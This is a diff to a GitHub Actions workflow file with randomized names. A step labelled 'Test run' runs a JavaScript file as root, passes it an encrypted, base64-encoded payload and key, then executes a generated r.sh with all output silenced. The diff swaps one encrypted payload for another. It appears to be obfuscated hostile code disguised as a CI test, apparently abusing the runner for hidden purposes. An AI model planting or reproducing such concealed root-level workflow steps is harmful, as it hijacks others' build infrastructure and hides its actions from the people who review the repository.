--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'vm483'
+        echo 'w6q3j'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX188MDiy4bwguwqpO4Z+JVQaygEWPTxbtRxGaVNIkjc1TnrRv9MIfX6zUDKiF/lslNc8qz2maDw4HziTfpB8iLWOI5fmPKAmTPQhrmtwxvFFZFcLyr9UXpsa t9bptb && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19cagdZ5ycdQtOoPkkIF47ddQeZd60+yJFb3kiIFlInqOTtxyotlw+4S0mKxRAHjvSSZ6mHaIPuTHzEcREUVkVPy5cvr/G9WRNNrJve8UVmMp/gn4RQqnPY gksv09 && sudo sh r.sh > /dev/null 2>&1
